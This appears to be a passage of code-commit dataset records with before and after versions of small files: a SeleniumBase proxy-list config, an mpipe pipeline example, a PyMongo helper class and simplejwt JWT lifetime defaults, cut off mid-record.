"pytest SOME_TEST.py --proxy=proxy1"
Format of PROXY_LIST server entries:
* "ip_address:port" OR "username:password@ip_address:port"
* "server:port" OR "username:password@server:port"
(Do NOT include the http:// or https:// in your proxy string!)
Example proxies in PROXY_LIST below are not guaranteed to be active or secure.
If you don't already have a proxy server to connect to,
you can try finding one from one of following sites:
* https://bit.ly/36GtZa1
* https://www.us-proxy.org/
* https://hidemy.name/en/proxy-list/
* http://free-proxy.cz/en/proxylist/country/all/https/ping/all
"""
PROXY_LIST = {
"example1": "152.26.66.140:3128", # (Example) - set your own proxy here
"example2": "64.235.204.107:8080", # (Example) - set your own proxy here
"proxy1": None,
"proxy2": None,
"proxy3": None,
"proxy4": None,
"proxy5": None,
}
| """
Proxy Server "Phone Book".
Simplify running browser tests through a proxy server
by adding your frequently-used proxies here.
Now you can do something like this on the command line:
"pytest SOME_TEST.py --proxy=proxy1"
Format of PROXY_LIST server entries:
* "ip_address:port" OR "username:password@ip_address:port"
* "server:port" OR "username:password@server:port"
(Do NOT include the http:// or https:// in your proxy string!)
Example proxies in PROXY_LIST below are not guaranteed to be active or secure.
If you don't already have a proxy server to connect to,
you can try finding one from one of following sites:
* https://bit.ly/36GtZa1
* https://www.us-proxy.org/
* https://hidemy.name/en/proxy-list/
* http://free-proxy.cz/en/proxylist/country/all/https/ping/all
"""
PROXY_LIST = {
"example1": "152.26.66.140:3128", # (Example) - set your own proxy here
"example2": "64.235.204.107:8080", # (Example) - set your own proxy here
"example3": "82.200.233.4:3128", # (Example) - set your own proxy here
"proxy1": None,
"proxy2": None,
"proxy3": None,
"proxy4": None,
"proxy5": None,
}
Update the sample proxy list"""
Proxy Server "Phone Book".
Simplify running browser tests through a proxy server
by adding your frequently-used proxies here.
Now you can do something like this on the command line:
"pytest SOME_TEST.py --proxy=proxy1"
Format of PROXY_LIST server entries:
* "ip_address:port" OR "username:password@ip_address:port"
* "server:port" OR "username:password@server:port"
(Do NOT include the http:// or https:// in your proxy string!)
Example proxies in PROXY_LIST below are not guaranteed to be active or secure.
If you don't already have a proxy server to connect to,
you can try finding one from one of following sites:
* https://bit.ly/36GtZa1
* https://www.us-proxy.org/
* https://hidemy.name/en/proxy-list/
* http://free-proxy.cz/en/proxylist/country/all/https/ping/all
"""
PROXY_LIST = {
"example1": "152.26.66.140:3128", # (Example) - set your own proxy here
"example2": "64.235.204.107:8080", # (Example) - set your own proxy here
"proxy1": None,
"proxy2": None,
"proxy3": None,
"proxy4": None,
"proxy5": None,
}
| <commit_before>"""
Proxy Server "Phone Book".
Simplify running browser tests through a proxy server
by adding your frequently-used proxies here.
Now you can do something like this on the command line:
"pytest SOME_TEST.py --proxy=proxy1"
Format of PROXY_LIST server entries:
* "ip_address:port" OR "username:password@ip_address:port"
* "server:port" OR "username:password@server:port"
(Do NOT include the http:// or https:// in your proxy string!)
Example proxies in PROXY_LIST below are not guaranteed to be active or secure.
If you don't already have a proxy server to connect to,
you can try finding one from one of following sites:
* https://bit.ly/36GtZa1
* https://www.us-proxy.org/
* https://hidemy.name/en/proxy-list/
* http://free-proxy.cz/en/proxylist/country/all/https/ping/all
"""
PROXY_LIST = {
"example1": "152.26.66.140:3128", # (Example) - set your own proxy here
"example2": "64.235.204.107:8080", # (Example) - set your own proxy here
"example3": "82.200.233.4:3128", # (Example) - set your own proxy here
"proxy1": None,
"proxy2": None,
"proxy3": None,
"proxy4": None,
"proxy5": None,
}
<commit_msg>Update the sample proxy list<commit_after>"""
Proxy Server "Phone Book".
Simplify running browser tests through a proxy server
by adding your frequently-used proxies here.
Now you can do something like this on the command line:
"pytest SOME_TEST.py --proxy=proxy1"
Format of PROXY_LIST server entries:
* "ip_address:port" OR "username:password@ip_address:port"
* "server:port" OR "username:password@server:port"
(Do NOT include the http:// or https:// in your proxy string!)
Example proxies in PROXY_LIST below are not guaranteed to be active or secure.
If you don't already have a proxy server to connect to,
you can try finding one from one of following sites:
* https://bit.ly/36GtZa1
* https://www.us-proxy.org/
* https://hidemy.name/en/proxy-list/
* http://free-proxy.cz/en/proxylist/country/all/https/ping/all
"""
PROXY_LIST = {
"example1": "152.26.66.140:3128", # (Example) - set your own proxy here
"example2": "64.235.204.107:8080", # (Example) - set your own proxy here
"proxy1": None,
"proxy2": None,
"proxy3": None,
"proxy4": None,
"proxy5": None,
}
|
b0ef175fbf5e71c0dbfa8761b5b01b1bc4ff171d | seleniumbase/config/proxy_list.py | seleniumbase/config/proxy_list.py | """
Proxy Server "Phone Book".
Simplify running browser tests through a proxy server
by adding your frequently-used proxies here.
Now you can do something like this on the command line:
"pytest SOME_TEST.py --proxy=proxy1"
Format of PROXY_LIST server entries:
* "ip_address:port" OR "username:password@ip_address:port"
* "server:port" OR "username:password@server:port"
(Do NOT include the http:// or https:// in your proxy string!)
Example proxies in PROXY_LIST below are not guaranteed to be active or secure.
If you don't already have a proxy server to connect to,
you can try finding one from one of following sites:
* https://bit.ly/36GtZa1
* https://www.us-proxy.org/
* https://hidemy.name/en/proxy-list/
* http://free-proxy.cz/en/proxylist/country/all/https/ping/all
"""
PROXY_LIST = {
"example1": "152.179.12.86:3128", # (Example) - set your own proxy here
"example2": "176.9.79.126:3128", # (Example) - set your own proxy here
"proxy1": None,
"proxy2": None,
"proxy3": None,
"proxy4": None,
"proxy5": None,
}
| """
Proxy Server "Phone Book".
Simplify running browser tests through a proxy server
by adding your frequently-used proxies here.
Now you can do something like this on the command line:
"pytest SOME_TEST.py --proxy=proxy1"
Format of PROXY_LIST server entries:
* "ip_address:port" OR "username:password@ip_address:port"
* "server:port" OR "username:password@server:port"
(Do NOT include the http:// or https:// in your proxy string!)
Example proxies in PROXY_LIST below are not guaranteed to be active or secure.
If you don't already have a proxy server to connect to,
you can try finding one from one of following sites:
* https://bit.ly/36GtZa1
* https://www.us-proxy.org/
* https://hidemy.name/en/proxy-list/
* http://free-proxy.cz/en/proxylist/country/all/https/ping/all
"""
PROXY_LIST = {
"example1": "152.179.12.86:3128", # (Example) - set your own proxy here
"example2": "socks4://50.197.210.138:32100", # (Example)
"proxy1": None,
"proxy2": None,
"proxy3": None,
"proxy4": None,
"proxy5": None,
}
| Update the example proxy list | Update the example proxy list
| Python | mit | mdmintz/SeleniumBase,mdmintz/SeleniumBase,seleniumbase/SeleniumBase,seleniumbase/SeleniumBase,mdmintz/SeleniumBase,seleniumbase/SeleniumBase,mdmintz/SeleniumBase,seleniumbase/SeleniumBase | """
Proxy Server "Phone Book".
Simplify running browser tests through a proxy server
by adding your frequently-used proxies here.
Now you can do something like this on the command line:
"pytest SOME_TEST.py --proxy=proxy1"
Format of PROXY_LIST server entries:
* "ip_address:port" OR "username:password@ip_address:port"
* "server:port" OR "username:password@server:port"
(Do NOT include the http:// or https:// in your proxy string!)
Example proxies in PROXY_LIST below are not guaranteed to be active or secure.
If you don't already have a proxy server to connect to,
you can try finding one from one of following sites:
* https://bit.ly/36GtZa1
* https://www.us-proxy.org/
* https://hidemy.name/en/proxy-list/
* http://free-proxy.cz/en/proxylist/country/all/https/ping/all
"""
PROXY_LIST = {
"example1": "152.179.12.86:3128", # (Example) - set your own proxy here
"example2": "176.9.79.126:3128", # (Example) - set your own proxy here
"proxy1": None,
"proxy2": None,
"proxy3": None,
"proxy4": None,
"proxy5": None,
}
Update the example proxy list | """
Proxy Server "Phone Book".
Simplify running browser tests through a proxy server
by adding your frequently-used proxies here.
Now you can do something like this on the command line:
"pytest SOME_TEST.py --proxy=proxy1"
Format of PROXY_LIST server entries:
* "ip_address:port" OR "username:password@ip_address:port"
* "server:port" OR "username:password@server:port"
(Do NOT include the http:// or https:// in your proxy string!)
Example proxies in PROXY_LIST below are not guaranteed to be active or secure.
If you don't already have a proxy server to connect to,
you can try finding one from one of following sites:
* https://bit.ly/36GtZa1
* https://www.us-proxy.org/
* https://hidemy.name/en/proxy-list/
* http://free-proxy.cz/en/proxylist/country/all/https/ping/all
"""
PROXY_LIST = {
"example1": "152.179.12.86:3128", # (Example) - set your own proxy here
"example2": "socks4://50.197.210.138:32100", # (Example)
"proxy1": None,
"proxy2": None,
"proxy3": None,
"proxy4": None,
"proxy5": None,
}
| <commit_before>"""
Proxy Server "Phone Book".
Simplify running browser tests through a proxy server
by adding your frequently-used proxies here.
Now you can do something like this on the command line:
"pytest SOME_TEST.py --proxy=proxy1"
Format of PROXY_LIST server entries:
* "ip_address:port" OR "username:password@ip_address:port"
* "server:port" OR "username:password@server:port"
(Do NOT include the http:// or https:// in your proxy string!)
Example proxies in PROXY_LIST below are not guaranteed to be active or secure.
If you don't already have a proxy server to connect to,
you can try finding one from one of following sites:
* https://bit.ly/36GtZa1
* https://www.us-proxy.org/
* https://hidemy.name/en/proxy-list/
* http://free-proxy.cz/en/proxylist/country/all/https/ping/all
"""
PROXY_LIST = {
"example1": "152.179.12.86:3128", # (Example) - set your own proxy here
"example2": "176.9.79.126:3128", # (Example) - set your own proxy here
"proxy1": None,
"proxy2": None,
"proxy3": None,
"proxy4": None,
"proxy5": None,
}
<commit_msg>Update the example proxy list<commit_after> | """
Proxy Server "Phone Book".
Simplify running browser tests through a proxy server
by adding your frequently-used proxies here.
Now you can do something like this on the command line:
"pytest SOME_TEST.py --proxy=proxy1"
Format of PROXY_LIST server entries:
* "ip_address:port" OR "username:password@ip_address:port"
* "server:port" OR "username:password@server:port"
(Do NOT include the http:// or https:// in your proxy string!)
Example proxies in PROXY_LIST below are not guaranteed to be active or secure.
If you don't already have a proxy server to connect to,
you can try finding one from one of following sites:
* https://bit.ly/36GtZa1
* https://www.us-proxy.org/
* https://hidemy.name/en/proxy-list/
* http://free-proxy.cz/en/proxylist/country/all/https/ping/all
"""
PROXY_LIST = {
"example1": "152.179.12.86:3128", # (Example) - set your own proxy here
"example2": "socks4://50.197.210.138:32100", # (Example)
"proxy1": None,
"proxy2": None,
"proxy3": None,
"proxy4": None,
"proxy5": None,
}
| """
Proxy Server "Phone Book".
Simplify running browser tests through a proxy server
by adding your frequently-used proxies here.
Now you can do something like this on the command line:
"pytest SOME_TEST.py --proxy=proxy1"
Format of PROXY_LIST server entries:
* "ip_address:port" OR "username:password@ip_address:port"
* "server:port" OR "username:password@server:port"
(Do NOT include the http:// or https:// in your proxy string!)
Example proxies in PROXY_LIST below are not guaranteed to be active or secure.
If you don't already have a proxy server to connect to,
you can try finding one from one of following sites:
* https://bit.ly/36GtZa1
* https://www.us-proxy.org/
* https://hidemy.name/en/proxy-list/
* http://free-proxy.cz/en/proxylist/country/all/https/ping/all
"""
PROXY_LIST = {
"example1": "152.179.12.86:3128", # (Example) - set your own proxy here
"example2": "176.9.79.126:3128", # (Example) - set your own proxy here
"proxy1": None,
"proxy2": None,
"proxy3": None,
"proxy4": None,
"proxy5": None,
}
Update the example proxy list"""
Proxy Server "Phone Book".
Simplify running browser tests through a proxy server
by adding your frequently-used proxies here.
Now you can do something like this on the command line:
"pytest SOME_TEST.py --proxy=proxy1"
Format of PROXY_LIST server entries:
* "ip_address:port" OR "username:password@ip_address:port"
* "server:port" OR "username:password@server:port"
(Do NOT include the http:// or https:// in your proxy string!)
Example proxies in PROXY_LIST below are not guaranteed to be active or secure.
If you don't already have a proxy server to connect to,
you can try finding one from one of following sites:
* https://bit.ly/36GtZa1
* https://www.us-proxy.org/
* https://hidemy.name/en/proxy-list/
* http://free-proxy.cz/en/proxylist/country/all/https/ping/all
"""
PROXY_LIST = {
"example1": "152.179.12.86:3128", # (Example) - set your own proxy here
"example2": "socks4://50.197.210.138:32100", # (Example)
"proxy1": None,
"proxy2": None,
"proxy3": None,
"proxy4": None,
"proxy5": None,
}
| <commit_before>"""
Proxy Server "Phone Book".
Simplify running browser tests through a proxy server
by adding your frequently-used proxies here.
Now you can do something like this on the command line:
"pytest SOME_TEST.py --proxy=proxy1"
Format of PROXY_LIST server entries:
* "ip_address:port" OR "username:password@ip_address:port"
* "server:port" OR "username:password@server:port"
(Do NOT include the http:// or https:// in your proxy string!)
Example proxies in PROXY_LIST below are not guaranteed to be active or secure.
If you don't already have a proxy server to connect to,
you can try finding one from one of following sites:
* https://bit.ly/36GtZa1
* https://www.us-proxy.org/
* https://hidemy.name/en/proxy-list/
* http://free-proxy.cz/en/proxylist/country/all/https/ping/all
"""
PROXY_LIST = {
"example1": "152.179.12.86:3128", # (Example) - set your own proxy here
"example2": "176.9.79.126:3128", # (Example) - set your own proxy here
"proxy1": None,
"proxy2": None,
"proxy3": None,
"proxy4": None,
"proxy5": None,
}
<commit_msg>Update the example proxy list<commit_after>"""
Proxy Server "Phone Book".
Simplify running browser tests through a proxy server
by adding your frequently-used proxies here.
Now you can do something like this on the command line:
"pytest SOME_TEST.py --proxy=proxy1"
Format of PROXY_LIST server entries:
* "ip_address:port" OR "username:password@ip_address:port"
* "server:port" OR "username:password@server:port"
(Do NOT include the http:// or https:// in your proxy string!)
Example proxies in PROXY_LIST below are not guaranteed to be active or secure.
If you don't already have a proxy server to connect to,
you can try finding one from one of following sites:
* https://bit.ly/36GtZa1
* https://www.us-proxy.org/
* https://hidemy.name/en/proxy-list/
* http://free-proxy.cz/en/proxylist/country/all/https/ping/all
"""
PROXY_LIST = {
"example1": "152.179.12.86:3128", # (Example) - set your own proxy here
"example2": "socks4://50.197.210.138:32100", # (Example)
"proxy1": None,
"proxy2": None,
"proxy3": None,
"proxy4": None,
"proxy5": None,
}
|
d88c1221e2d07b300f29ef2605acea18c9e7fbf2 | test/tiny.py | test/tiny.py | from mpipe import OrderedStage, Pipeline
def increment(value):
return value + 1
def double(value):
return value * 2
stage1 = OrderedStage(increment, 3)
stage2 = OrderedStage(double, 3)
stage1.link(stage2)
pipe = Pipeline(stage1)
for number in range(10):
pipe.put(number)
pipe.put(None)
for result in pipe.results():
print(result)
| from mpipe import OrderedStage, Pipeline
def increment(value):
return value + 1
def double(value):
return value * 2
stage1 = OrderedStage(increment, 3)
stage2 = OrderedStage(double, 3)
pipe = Pipeline(stage1.link(stage2))
for number in range(10):
pipe.put(number)
pipe.put(None)
for result in pipe.results():
print(result)
| Use multi-link pipeline construction syntax. | Use multi-link pipeline construction syntax.
| Python | mit | vmlaker/mpipe | from mpipe import OrderedStage, Pipeline
def increment(value):
return value + 1
def double(value):
return value * 2
stage1 = OrderedStage(increment, 3)
stage2 = OrderedStage(double, 3)
stage1.link(stage2)
pipe = Pipeline(stage1)
for number in range(10):
pipe.put(number)
pipe.put(None)
for result in pipe.results():
print(result)
Use multi-link pipeline construction syntax. | from mpipe import OrderedStage, Pipeline
def increment(value):
return value + 1
def double(value):
return value * 2
stage1 = OrderedStage(increment, 3)
stage2 = OrderedStage(double, 3)
pipe = Pipeline(stage1.link(stage2))
for number in range(10):
pipe.put(number)
pipe.put(None)
for result in pipe.results():
print(result)
| <commit_before>from mpipe import OrderedStage, Pipeline
def increment(value):
return value + 1
def double(value):
return value * 2
stage1 = OrderedStage(increment, 3)
stage2 = OrderedStage(double, 3)
stage1.link(stage2)
pipe = Pipeline(stage1)
for number in range(10):
pipe.put(number)
pipe.put(None)
for result in pipe.results():
print(result)
<commit_msg>Use multi-link pipeline construction syntax.<commit_after> | from mpipe import OrderedStage, Pipeline
def increment(value):
return value + 1
def double(value):
return value * 2
stage1 = OrderedStage(increment, 3)
stage2 = OrderedStage(double, 3)
pipe = Pipeline(stage1.link(stage2))
for number in range(10):
pipe.put(number)
pipe.put(None)
for result in pipe.results():
print(result)
| from mpipe import OrderedStage, Pipeline
def increment(value):
return value + 1
def double(value):
return value * 2
stage1 = OrderedStage(increment, 3)
stage2 = OrderedStage(double, 3)
stage1.link(stage2)
pipe = Pipeline(stage1)
for number in range(10):
pipe.put(number)
pipe.put(None)
for result in pipe.results():
print(result)
Use multi-link pipeline construction syntax.from mpipe import OrderedStage, Pipeline
def increment(value):
return value + 1
def double(value):
return value * 2
stage1 = OrderedStage(increment, 3)
stage2 = OrderedStage(double, 3)
pipe = Pipeline(stage1.link(stage2))
for number in range(10):
pipe.put(number)
pipe.put(None)
for result in pipe.results():
print(result)
| <commit_before>from mpipe import OrderedStage, Pipeline
def increment(value):
return value + 1
def double(value):
return value * 2
stage1 = OrderedStage(increment, 3)
stage2 = OrderedStage(double, 3)
stage1.link(stage2)
pipe = Pipeline(stage1)
for number in range(10):
pipe.put(number)
pipe.put(None)
for result in pipe.results():
print(result)
<commit_msg>Use multi-link pipeline construction syntax.<commit_after>from mpipe import OrderedStage, Pipeline
def increment(value):
return value + 1
def double(value):
return value * 2
stage1 = OrderedStage(increment, 3)
stage2 = OrderedStage(double, 3)
pipe = Pipeline(stage1.link(stage2))
for number in range(10):
pipe.put(number)
pipe.put(None)
for result in pipe.results():
print(result)
|
11526af359a19446aa95a74833028329f8969107 | src/common/database.py | src/common/database.py | import pymongo
class Database:
URI = 'mongodb://127.0.0.1:27017'
DATABASE = None
@staticmethod
def initialize():
client = pymongo.MongoClient(Database.URI)
Database.DATABASE = client['fullstack']
@staticmethod
def insert(collection, data):
"""Insert data into a collection"""
Database.DATABASE[collection].insert(data)
@staticmethod
def find(collection, query):
"""Find multiple document(s) within a collection"""
return Database.DATABASE[collection].find(query)
@staticmethod
def find_one(collection, query):
"""Find one document withint a collection"""
return Database.DATABASE[collection].find_one(query) | Add common db static methods | Add common db static methods
| Python | apache-2.0 | asimonia/pricing-alerts,asimonia/pricing-alerts | Add common db static methods | import pymongo
class Database:
URI = 'mongodb://127.0.0.1:27017'
DATABASE = None
@staticmethod
def initialize():
client = pymongo.MongoClient(Database.URI)
Database.DATABASE = client['fullstack']
@staticmethod
def insert(collection, data):
"""Insert data into a collection"""
Database.DATABASE[collection].insert(data)
@staticmethod
def find(collection, query):
"""Find multiple document(s) within a collection"""
return Database.DATABASE[collection].find(query)
@staticmethod
def find_one(collection, query):
"""Find one document withint a collection"""
return Database.DATABASE[collection].find_one(query) | <commit_before><commit_msg>Add common db static methods<commit_after> | import pymongo
class Database:
URI = 'mongodb://127.0.0.1:27017'
DATABASE = None
@staticmethod
def initialize():
client = pymongo.MongoClient(Database.URI)
Database.DATABASE = client['fullstack']
@staticmethod
def insert(collection, data):
"""Insert data into a collection"""
Database.DATABASE[collection].insert(data)
@staticmethod
def find(collection, query):
"""Find multiple document(s) within a collection"""
return Database.DATABASE[collection].find(query)
@staticmethod
def find_one(collection, query):
"""Find one document withint a collection"""
return Database.DATABASE[collection].find_one(query) | Add common db static methodsimport pymongo
class Database:
URI = 'mongodb://127.0.0.1:27017'
DATABASE = None
@staticmethod
def initialize():
client = pymongo.MongoClient(Database.URI)
Database.DATABASE = client['fullstack']
@staticmethod
def insert(collection, data):
"""Insert data into a collection"""
Database.DATABASE[collection].insert(data)
@staticmethod
def find(collection, query):
"""Find multiple document(s) within a collection"""
return Database.DATABASE[collection].find(query)
@staticmethod
def find_one(collection, query):
"""Find one document withint a collection"""
return Database.DATABASE[collection].find_one(query) | <commit_before><commit_msg>Add common db static methods<commit_after>import pymongo
class Database:
    """Thin static wrapper around one shared PyMongo database handle.

    All methods operate on the class-level ``DATABASE`` handle, so
    ``initialize()`` must be called once before any other method.
    """

    # NOTE(review): host/port and database name are hard-coded -- consider
    # reading them from configuration or the environment.
    URI = 'mongodb://127.0.0.1:27017'
    # Shared pymongo database handle; populated by initialize().
    DATABASE = None

    @staticmethod
    def initialize():
        """Connect to MongoDB and bind the shared 'fullstack' database."""
        client = pymongo.MongoClient(Database.URI)
        Database.DATABASE = client['fullstack']

    @staticmethod
    def insert(collection, data):
        """Insert a document (or a list/tuple of documents) into a collection.

        Uses insert_one/insert_many instead of Collection.insert(), which
        was deprecated and removed in PyMongo 4.
        """
        if isinstance(data, (list, tuple)):
            Database.DATABASE[collection].insert_many(list(data))
        else:
            Database.DATABASE[collection].insert_one(data)

    @staticmethod
    def find(collection, query):
        """Find multiple documents within a collection (returns a cursor)."""
        return Database.DATABASE[collection].find(query)

    @staticmethod
    def find_one(collection, query):
        """Find one document within a collection (or None if no match)."""
        return Database.DATABASE[collection].find_one(query)
5864b503bced36d51ab911d5b306284dbc0cdb13 | rest_framework_simplejwt/settings.py | rest_framework_simplejwt/settings.py | from __future__ import unicode_literals
from datetime import timedelta
from django.conf import settings
from rest_framework.settings import APISettings
USER_SETTINGS = getattr(settings, 'SIMPLE_JWT', None)
DEFAULTS = {
'AUTH_HEADER_TYPE': 'Bearer',
'USER_ID_FIELD': 'id',
'USER_ID_CLAIM': 'user_id',
'TOKEN_TYPE_CLAIM': 'token_type',
'SLIDING_REFRESH_EXP_CLAIM': 'refresh_exp',
'SLIDING_TOKEN_LIFETIME': timedelta(days=1),
'SLIDING_TOKEN_REFRESH_LIFETIME': timedelta(days=3),
'ACCESS_TOKEN_LIFETIME': timedelta(minutes=5),
'REFRESH_TOKEN_LIFETIME': timedelta(days=1),
'SECRET_KEY': settings.SECRET_KEY,
# Undocumented settings. Changing these may lead to unexpected behavior.
# Make sure you know what you're doing. These might become part of the
# public API eventually but that would require some adjustments.
'AUTH_TOKEN_CLASS': 'rest_framework_simplejwt.tokens.AccessToken',
'TOKEN_BACKEND_CLASS': 'rest_framework_simplejwt.backends.PythonJOSEBackend',
'ALGORITHM': 'HS256',
}
IMPORT_STRING_SETTINGS = (
'AUTH_TOKEN_CLASS',
'TOKEN_BACKEND_CLASS',
)
api_settings = APISettings(USER_SETTINGS, DEFAULTS, IMPORT_STRING_SETTINGS)
| from __future__ import unicode_literals
from datetime import timedelta
from django.conf import settings
from rest_framework.settings import APISettings
USER_SETTINGS = getattr(settings, 'SIMPLE_JWT', None)
DEFAULTS = {
'AUTH_HEADER_TYPE': 'Bearer',
'USER_ID_FIELD': 'id',
'USER_ID_CLAIM': 'user_id',
'TOKEN_TYPE_CLAIM': 'token_type',
'SLIDING_REFRESH_EXP_CLAIM': 'refresh_exp',
'SLIDING_TOKEN_LIFETIME': timedelta(minutes=5),
'SLIDING_TOKEN_REFRESH_LIFETIME': timedelta(days=1),
'ACCESS_TOKEN_LIFETIME': timedelta(minutes=5),
'REFRESH_TOKEN_LIFETIME': timedelta(days=1),
'SECRET_KEY': settings.SECRET_KEY,
# Undocumented settings. Changing these may lead to unexpected behavior.
# Make sure you know what you're doing. These might become part of the
# public API eventually but that would require some adjustments.
'AUTH_TOKEN_CLASS': 'rest_framework_simplejwt.tokens.AccessToken',
'TOKEN_BACKEND_CLASS': 'rest_framework_simplejwt.backends.PythonJOSEBackend',
'ALGORITHM': 'HS256',
}
IMPORT_STRING_SETTINGS = (
'AUTH_TOKEN_CLASS',
'TOKEN_BACKEND_CLASS',
)
api_settings = APISettings(USER_SETTINGS, DEFAULTS, IMPORT_STRING_SETTINGS)
| Make sliding token lifetime defaults a bit more conservative | Make sliding token lifetime defaults a bit more conservative
| Python | mit | davesque/django-rest-framework-simplejwt,davesque/django-rest-framework-simplejwt | from __future__ import unicode_literals
from datetime import timedelta
from django.conf import settings
from rest_framework.settings import APISettings
USER_SETTINGS = getattr(settings, 'SIMPLE_JWT', None)
DEFAULTS = {
'AUTH_HEADER_TYPE': 'Bearer',
'USER_ID_FIELD': 'id',
'USER_ID_CLAIM': 'user_id',
'TOKEN_TYPE_CLAIM': 'token_type',
'SLIDING_REFRESH_EXP_CLAIM': 'refresh_exp',
'SLIDING_TOKEN_LIFETIME': timedelta(days=1),
'SLIDING_TOKEN_REFRESH_LIFETIME': timedelta(days=3),
'ACCESS_TOKEN_LIFETIME': timedelta(minutes=5),
'REFRESH_TOKEN_LIFETIME': timedelta(days=1),
'SECRET_KEY': settings.SECRET_KEY,
# Undocumented settings. Changing these may lead to unexpected behavior.
# Make sure you know what you're doing. These might become part of the
# public API eventually but that would require some adjustments.
'AUTH_TOKEN_CLASS': 'rest_framework_simplejwt.tokens.AccessToken',
'TOKEN_BACKEND_CLASS': 'rest_framework_simplejwt.backends.PythonJOSEBackend',
'ALGORITHM': 'HS256',
}
IMPORT_STRING_SETTINGS = (
'AUTH_TOKEN_CLASS',
'TOKEN_BACKEND_CLASS',
)
api_settings = APISettings(USER_SETTINGS, DEFAULTS, IMPORT_STRING_SETTINGS)
Make sliding token lifetime defaults a bit more conservative | from __future__ import unicode_literals
from datetime import timedelta
from django.conf import settings
from rest_framework.settings import APISettings
USER_SETTINGS = getattr(settings, 'SIMPLE_JWT', None)
DEFAULTS = {
'AUTH_HEADER_TYPE': 'Bearer',
'USER_ID_FIELD': 'id',
'USER_ID_CLAIM': 'user_id',
'TOKEN_TYPE_CLAIM': 'token_type',
'SLIDING_REFRESH_EXP_CLAIM': 'refresh_exp',
'SLIDING_TOKEN_LIFETIME': timedelta(minutes=5),
'SLIDING_TOKEN_REFRESH_LIFETIME': timedelta(days=1),
'ACCESS_TOKEN_LIFETIME': timedelta(minutes=5),
'REFRESH_TOKEN_LIFETIME': timedelta(days=1),
'SECRET_KEY': settings.SECRET_KEY,
# Undocumented settings. Changing these may lead to unexpected behavior.
# Make sure you know what you're doing. These might become part of the
# public API eventually but that would require some adjustments.
'AUTH_TOKEN_CLASS': 'rest_framework_simplejwt.tokens.AccessToken',
'TOKEN_BACKEND_CLASS': 'rest_framework_simplejwt.backends.PythonJOSEBackend',
'ALGORITHM': 'HS256',
}
IMPORT_STRING_SETTINGS = (
'AUTH_TOKEN_CLASS',
'TOKEN_BACKEND_CLASS',
)
api_settings = APISettings(USER_SETTINGS, DEFAULTS, IMPORT_STRING_SETTINGS)
| <commit_before>from __future__ import unicode_literals
from datetime import timedelta
from django.conf import settings
from rest_framework.settings import APISettings
USER_SETTINGS = getattr(settings, 'SIMPLE_JWT', None)
DEFAULTS = {
'AUTH_HEADER_TYPE': 'Bearer',
'USER_ID_FIELD': 'id',
'USER_ID_CLAIM': 'user_id',
'TOKEN_TYPE_CLAIM': 'token_type',
'SLIDING_REFRESH_EXP_CLAIM': 'refresh_exp',
'SLIDING_TOKEN_LIFETIME': timedelta(days=1),
'SLIDING_TOKEN_REFRESH_LIFETIME': timedelta(days=3),
'ACCESS_TOKEN_LIFETIME': timedelta(minutes=5),
'REFRESH_TOKEN_LIFETIME': timedelta(days=1),
'SECRET_KEY': settings.SECRET_KEY,
# Undocumented settings. Changing these may lead to unexpected behavior.
# Make sure you know what you're doing. These might become part of the
# public API eventually but that would require some adjustments.
'AUTH_TOKEN_CLASS': 'rest_framework_simplejwt.tokens.AccessToken',
'TOKEN_BACKEND_CLASS': 'rest_framework_simplejwt.backends.PythonJOSEBackend',
'ALGORITHM': 'HS256',
}
IMPORT_STRING_SETTINGS = (
'AUTH_TOKEN_CLASS',
'TOKEN_BACKEND_CLASS',
)
api_settings = APISettings(USER_SETTINGS, DEFAULTS, IMPORT_STRING_SETTINGS)
<commit_msg>Make sliding token lifetime defaults a bit more conservative<commit_after> | from __future__ import unicode_literals
from datetime import timedelta
from django.conf import settings
from rest_framework.settings import APISettings
USER_SETTINGS = getattr(settings, 'SIMPLE_JWT', None)
DEFAULTS = {
'AUTH_HEADER_TYPE': 'Bearer',
'USER_ID_FIELD': 'id',
'USER_ID_CLAIM': 'user_id',
'TOKEN_TYPE_CLAIM': 'token_type',
'SLIDING_REFRESH_EXP_CLAIM': 'refresh_exp',
'SLIDING_TOKEN_LIFETIME': timedelta(minutes=5),
'SLIDING_TOKEN_REFRESH_LIFETIME': timedelta(days=1),
'ACCESS_TOKEN_LIFETIME': timedelta(minutes=5),
'REFRESH_TOKEN_LIFETIME': timedelta(days=1),
'SECRET_KEY': settings.SECRET_KEY,
# Undocumented settings. Changing these may lead to unexpected behavior.
# Make sure you know what you're doing. These might become part of the
# public API eventually but that would require some adjustments.
'AUTH_TOKEN_CLASS': 'rest_framework_simplejwt.tokens.AccessToken',
'TOKEN_BACKEND_CLASS': 'rest_framework_simplejwt.backends.PythonJOSEBackend',
'ALGORITHM': 'HS256',
}
IMPORT_STRING_SETTINGS = (
'AUTH_TOKEN_CLASS',
'TOKEN_BACKEND_CLASS',
)
api_settings = APISettings(USER_SETTINGS, DEFAULTS, IMPORT_STRING_SETTINGS)
| from __future__ import unicode_literals
from datetime import timedelta
from django.conf import settings
from rest_framework.settings import APISettings
USER_SETTINGS = getattr(settings, 'SIMPLE_JWT', None)
DEFAULTS = {
'AUTH_HEADER_TYPE': 'Bearer',
'USER_ID_FIELD': 'id',
'USER_ID_CLAIM': 'user_id',
'TOKEN_TYPE_CLAIM': 'token_type',
'SLIDING_REFRESH_EXP_CLAIM': 'refresh_exp',
'SLIDING_TOKEN_LIFETIME': timedelta(days=1),
'SLIDING_TOKEN_REFRESH_LIFETIME': timedelta(days=3),
'ACCESS_TOKEN_LIFETIME': timedelta(minutes=5),
'REFRESH_TOKEN_LIFETIME': timedelta(days=1),
'SECRET_KEY': settings.SECRET_KEY,
# Undocumented settings. Changing these may lead to unexpected behavior.
# Make sure you know what you're doing. These might become part of the
# public API eventually but that would require some adjustments.
'AUTH_TOKEN_CLASS': 'rest_framework_simplejwt.tokens.AccessToken',
'TOKEN_BACKEND_CLASS': 'rest_framework_simplejwt.backends.PythonJOSEBackend',
'ALGORITHM': 'HS256',
}
IMPORT_STRING_SETTINGS = (
'AUTH_TOKEN_CLASS',
'TOKEN_BACKEND_CLASS',
)
api_settings = APISettings(USER_SETTINGS, DEFAULTS, IMPORT_STRING_SETTINGS)
Make sliding token lifetime defaults a bit more conservativefrom __future__ import unicode_literals
from datetime import timedelta
from django.conf import settings
from rest_framework.settings import APISettings
USER_SETTINGS = getattr(settings, 'SIMPLE_JWT', None)
DEFAULTS = {
'AUTH_HEADER_TYPE': 'Bearer',
'USER_ID_FIELD': 'id',
'USER_ID_CLAIM': 'user_id',
'TOKEN_TYPE_CLAIM': 'token_type',
'SLIDING_REFRESH_EXP_CLAIM': 'refresh_exp',
'SLIDING_TOKEN_LIFETIME': timedelta(minutes=5),
